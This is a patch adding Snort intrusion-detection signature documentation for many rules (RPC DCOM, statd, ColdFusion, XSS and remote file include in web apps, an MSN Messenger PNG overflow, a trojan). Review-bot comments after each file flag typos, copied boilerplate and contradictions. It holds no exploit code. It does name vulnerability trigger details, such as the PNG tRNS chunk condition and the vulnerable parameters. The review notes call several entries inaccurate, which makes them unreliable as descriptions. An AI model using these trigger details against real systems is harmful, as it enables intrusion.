+network traffic that may constitute an attack. Specifically an arp 
+cache overwrite attack was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
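Review bot: Attack Scenarios is empty and Detailed Information only restates the Summary, so the entry never says what spp_arpspoof checked when it raised an `arp cache overwrite attack` event or what the attacker gains from it: an ARP reply that rewrites a victim's IP-to-MAC mapping lets the attacker intercept or alter that host's traffic, which also makes `Impact: Unknown.` wrong. `Apply any appropriate vendor supplied patches` does not fit an ARP spoofing alert; there is no patch for ARP, the mitigations are static ARP entries for critical hosts and switch-level protections, plus identifying which host answered with the conflicting MAC. `consititute` is a typo.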
--- /dev/null
+++ b/doc/signatures/916.txt
@@ -0,0 +1,62 @@
+SID:
+916
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
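Review bot: the section layout differs from every other file in this patch: `SID:` comes before `Rule:`, the separators sit below a blank line instead of above one, and the last section is `References:` rather than `Additional References:`; normalise so the files parse the same way. Typos: `This even indicates` (event), `This data can be accesses` (accessed), `at type of writing` (time of writing), and `Medium, Attackers need` should be `Medium. Attackers need`. Since Ease of Attack says the attacker must already be able to place files on the server, the Summary should say so, and False Positives should consider legitimate in-house pages that use the same tags.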
--- /dev/null
+++ b/doc/signatures/3150.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+3150
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Windows SQL Server.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft Windows SQL Server 2000 uses the SQLXML component to process
+database queries via XML.
+
+Due to a programming error a buffer overrun condition is present in the
+SQLXML ISAPI component that processes the XML queries via HTTP. The
+overrun condition can be exploited by manipulating the contenttype
+variable used to control the Content-Type header. The ISAPI extension
+does not correctly check the length of the contenttype parameter. It may
+be possible for an attacker with user privileges on the target host to
+exploit the condition by supplying extra data in the affected parameter.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the
+contenttype parameter of a malicious XML query. The attacker may then
+insert code of their choosing to either run commands on the system or
+execute the code with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
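Review bot: Detailed Information says the overflow is exploitable by `an attacker with user privileges on the target host`, but the same paragraph and the Attack Scenarios entry describe a malicious XML query sent over HTTP to the SQLXML ISAPI extension, which needs no local account; drop the local-privilege qualifier or explain where it comes from. `Microsoft Windows SQL Server` is not the product name (Microsoft SQL Server 2000), and Affected Systems should also list the SQLXML versions involved, since the ISAPI extension is versioned separately from the database engine. Additional References is empty for a bug this specific.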
--- /dev/null
+++ b/doc/signatures/1891.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1891
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an
+unvalidated format string error associated the with Remote Procedure
+Call (RPC) statd.
+
+--
+Impact:
+Remote root access. If successful, this exploit allows execution of
+arbitrary commands as root.
+
+--
+Detailed Information:
+The statd RPC services implements a component of the Network File System
+(NFS) known as the Network Status and Monitor protocol.  A vulnerability
+exists due to improper format string checking that allows arbitrary code
+to be executed with the privileges of statd, usually root.
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	RedHat Linux 6.0, 6.1, 6.2
+	RedHat nfs-utils-0.1.6-2.i386.rpm + RedHat Linux 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd
+runs and send the exploit to the statd port. If the portmapper port is
+blocked, the attacker may send the exploit to any listening port in the
+range associated with RPC services.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
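Review bot: `associated the with Remote Procedure Call (RPC) statd` has the words out of order, `The statd RPC services implements` should be `service implements`, and Affected Systems lists `Conectiva Linux 4.0, 4.0` twice. The protocol is the Network Status Monitor (NSM), not `Network Status and Monitor`. Additional References is empty although this is a well-known format string bug with a published advisory and CVE entry; add them. The Attack Scenarios claim that a blocked portmapper can be bypassed by sending the exploit `to any listening port in the range associated with RPC services` needs a sentence on why (the attacker can scan for the statd port directly), otherwise it reads as guesswork.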
--- /dev/null
+++ b/doc/signatures/2286.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2286
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Unauthorized electronic mail relaying.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the script
+friends.php included in the PHP application vbPortal. This may indicate
+an attempt to use the server as an email relay.
+
+--
+Affected Systems:
+	All systems running the PHP application vbPortal
+
+--
+Attack Scenarios:
+The attacker could access the friends.php script directly to send spam
+email to thousands of recipients using the server as a relay.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
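Review bot: the Summary (`a known vulnerability in a PHP web application`) should name vbPortal and `friends.php` up front as Detailed Information does. More importantly, the rule as described fires on any access to `friends.php`, and since that script exists to send mail on behalf of site users, legitimate use will trigger it too; `False Positives: None known` is wrong, and the analyst should be told to look at request volume and recipient count rather than a single hit. Additional References is empty.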
--- /dev/null
+++ b/doc/signatures/118.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+118
+
+--
+Summary:
+Satans Backdoor is a Trojan Horse capable of stealing passwords. This 
+event is generated when an infected machine replies to the attackers 
+connection attempt.
+
+--
+Impact:
+Possible theft of data and passwords.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	
+The Trojan server always communcates via port 666 and cannot be changed 
+by the attacker. The server portion itself is named winvmm32.exe, this 
+also cannot be changed. The main purpose of this Trojan is password 
+stealing thus presenting the attacker with access to other machines and 
+possible further compromise of data.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located called winvmm32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the file winvmm32.exe.
+
+Kill the process winvmm32.exe.
+
+--
+Contributors:
+Orignal rule by  webmaster@tlsecurity.net
+
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS316
+
+--
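Review bot: the two Corrective Action steps are in the wrong order: "Delete the file winvmm32.exe." comes before "Kill the process winvmm32.exe.", but a running executable cannot be deleted on Windows, so the process has to be killed first. The sentence "The Trojan server is located called winvmm32.exe." in Ease of Attack is garbled and should read something like "The Trojan server file is called winvmm32.exe."; and since the Summary says the event fires when the infected host replies to the attacker, Corrective Action should make clear that the replying host (the one on port 666) is the machine to clean. Typos: "communcates", "Orignal", and the double space before "webmaster@tlsecurity.net".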
--- /dev/null
+++ b/doc/signatures/100000786.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000786
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "cat" parameter in the "browse.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
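Review bot: the file starts with two blank lines before "Rule:" and the Sid, Affected Systems and Contributors blocks have no blank line before their "--" separators, unlike the other signature files in this patch; normalise the layout so tools that split on the separators behave the same for every file. Impact is copied from the remote-include boilerplate ("system integrity compromise", "execution of arbitrary code") and overstates a reflected cross site scripting bug in the "cat" parameter of browse.php, whose realistic impact is script execution in a victim's browser and exposure of session data; the "execute system binaries" paragraph in Detailed Information has the same problem. "All systems running CGI applications using ATutor" should read "All systems running ATutor" with the affected versions, and Corrective Action should add that the application must encode the "cat" value on output, since patching is the only measure the text currently gives.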
--- /dev/null
+++ b/doc/signatures/100000479.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000479
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "CzarNews" application running on a webserver. 
+Access to the file "headlines.php" using a remote file being passed as the 
+"tpath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "tpath" parameter in the "headlines.php" script used by 
+the "CzarNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CzarNews
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
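Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials ...") and the whole Attack Scenarios section describe credential and authentication attacks, which have nothing to do with the remote file include through the "tpath" parameter of headlines.php that the Summary documents; replace them with the include scenario the Summary already describes (a remote file reference supplied in "tpath" that the server fetches and executes). Corrective Action should mention, alongside patching, disabling remote URL inclusion in the PHP configuration (allow_url_include, and allow_url_fopen on older releases), which is the standard mitigation for this class. "exploitation attempt has been attempted" in the Summary is redundant, and "ona" is a typo for "on a".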
--- /dev/null
+++ b/doc/signatures/3130.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3130
+
+--
+Summary:
+This alert is generated when a malicious PNG file is sent to an MSN Messenger
+client. Vulnerable clients which receive such a file are vulnerable to remote
+code execution attacks.
+
+--
+Impact:
+Arbitrary code may be executed in the context of the user running MSN Messenger.
+Their messenger client may or may not crash, depending upon the way the PNG file
+is written.
+
+--
+Detailed Information:
+This vulnerability is due to a buffer overflow in the processing of tRNS chunks
+of PNG files. In order to trigger the overflow, the color type field of the IHDR
+chunk must be set to 0x03, and the length of the tRNS chunk must be greater than
+256. 
+
+--
+Affected Systems:
+	MSN Messenger 6.1
+	MSN Messenger 6.2
+
+--
+Attack Scenarios:
+An attacker may send a malicious PNG through a direct file transfer, as a
+thumbnail for a file transfer, as a custom emoticon, or by setting their buddy
+icon to be the malicious PNG. In all cases, the PNG is sent via an MSN file
+transfer.
+
+--
+Ease of Attack:
+Very simple. Example PNGs with shellcode are available on the web, and attacking
+via all but the file transfer thumbnail vector is accomplished with simple,
+everyday MSN Messenger tasks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+Thumbnails of image transfers are sent in an encoded format. As a result, they
+cannot be detected. However, making the thumbnail contain malicious data is
+exponentially more difficult than any of the other attack vectors, as an
+attacker cannot manually specify the thumbnail to be sent.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
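Review bot: Additional References is empty although Detailed Information makes precise, checkable claims (IHDR color type 0x03, tRNS chunk length greater than 256) and Corrective Action says to apply "the appropriate vendor supplied patch" without naming it; add the Microsoft bulletin for the MSN Messenger 6.1/6.2 PNG fix so the reader can verify the condition and locate the patch. It would also help triage to state in False Positives why a well formed palette PNG cannot match: for color type 3 the tRNS chunk carries one alpha byte per palette entry and a palette has at most 256 entries, so a tRNS longer than 256 bytes is never valid, which is the real justification for "None Known.".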
--- /dev/null
+++ b/doc/signatures/3397.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3397
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
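Review bot: the Attack Scenarios sentence ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which says the overflow is triggered by a malformed request sent to an RPC port; if the overlong filename is the field inside the DCOM request that overflows, say so, otherwise the reader is left with two different triggers. "Expoit" in Ease of Attack is a typo. Since 3387, 3280 and 3275 in this same patch carry word for word the same text, each file should state which transport, port or request type its SID covers, otherwise an analyst seeing one of the four events cannot tell them apart.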
--- /dev/null
+++ b/doc/signatures/3387.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3387
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
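Review bot: this text is identical to 3397.txt (and to 3280.txt and 3275.txt) apart from the Sid line; a signature document that does not say what distinguishes its rule is of little use when the event fires, so add at least one sentence to Detailed Information naming the transport (TCP or UDP), port or request that SID 3387 specifically matches. The Corrective Action advice to block "ports 135, 139 and 445 for both TCP and UDP" is sound but shared by all four files, so the rule-specific port is exactly the detail that should differ. "Expoit" is a typo.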
--- /dev/null
+++ b/doc/signatures/1998.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1998
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the file
+calendar.php. Multiple applications are vulnerable to SQL injection
+techniques that may lead to the execution of SQL code of the attackers
+choosing.
+
+--
+Affected Systems:
+	All systems running PHP calendar applications
+	VBulletin
+	Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can manipulate user supplied variables to include SQL code
+of their choosing in the request to a vulnerable application.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
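Review bot: "False Positives: None known." contradicts Detailed Information, which says the event fires "when an attempt is made to access the file calendar.php"; calendar.php is a common filename and every legitimate visit to the calendar of vBulletin, Invision Power Board or any other PHP application will match unless the rule also keys on SQL content in the request, in which case that condition should be documented here so analysts know what to look for in the packet. The Affected Systems list mixes a category ("All systems running PHP calendar applications") with two products and gives no versions; "VBulletin" is normally written vBulletin.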
--- /dev/null
+++ b/doc/signatures/3280.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3280
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
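Review bot: apart from the Sid this file repeats 3397.txt verbatim, including the "Expoit" typo and the mismatch between Attack Scenarios (overly long filename via a network share) and Detailed Information (malformed request to an RPC port); fix the shared text once and make sure the fix lands in all four DCOM files, and add to this one the detail that distinguishes SID 3280 from the others.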
--- /dev/null
+++ b/doc/signatures/100000565.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000565
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "action" parameter in the "show.php" script 
+used by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
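Review bot: the Sid, Affected Systems and Contributors blocks lack the blank line before "--" used elsewhere in the patch, so the separator layout is inconsistent even within this file. Impact and the second Detailed Information paragraph reuse the remote file include boilerplate ("execution of arbitrary code", "execute system binaries"), which is not what a cross site scripting flaw in the "action" parameter of show.php gives an attacker; state the client-side impact (script runs in the victim's browser, session cookies and page content exposed) instead. 100000564.txt in this patch documents the "search" parameter of the same script with the same text; a sentence noting that the two rules cover different parameters of show.php would explain why both may fire on one request.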
--- /dev/null
+++ b/doc/signatures/2450.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2450
+
+--
+Summary:
+This event is generated when a user in your network has successfully logged into Yahoo Instant Messenger.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A user must successfully logon to an Yahoo Instant Messenger server before participating in any exchanges, such sending or receiving messages, files, or webcams, or chatting by voice.  Many of these activities are not appropriate in a corporate environment.  Also, the exchanges are transacted via Yahoo IM servers so there is no assurance of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+Once logged in, a Yahoo IM user may unwittingly accept a malicious file that may contain a worm, virus, Trojan, or backdoor to name a few.
+
+--
+Ease of Attack:
+Easy. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
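Review bot: "Ease of Attack: Easy." is meaningless for a policy rule that fires on a successful login, since no attack is involved; either say "Not applicable" or describe what the section means here. The False Negatives remark that Yahoo IM "may use other ports than the default expected ones" should name the default ports the rule is bound to, or the port variable, so an operator knows what to widen. Grammar: "logon to an Yahoo" should be "log on to a Yahoo", and "such sending or receiving" is missing "as".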
--- /dev/null
+++ b/doc/signatures/2646.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2646
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_offline" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
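Review bot: the paragraph "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a Snort configuration instruction, not vulnerability information, and gives no reason; move it to False Negatives and explain that the Oracle listener on Windows commonly redirects a session to a dynamically assigned port, so a fixed port list misses the traffic. Attack Scenarios says the attack "requires an attacker to logon to the database with a valid username and password combination", which should be reflected in Ease of Attack (currently just "Simple.") and in Impact, since an authenticated attacker is a different risk from a remote unauthenticated one. Also "a Oracle" should be "an Oracle", and the Affected Systems entry is indented with spaces where the other files use a tab.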
--- /dev/null
+++ b/doc/signatures/1877.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1877
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
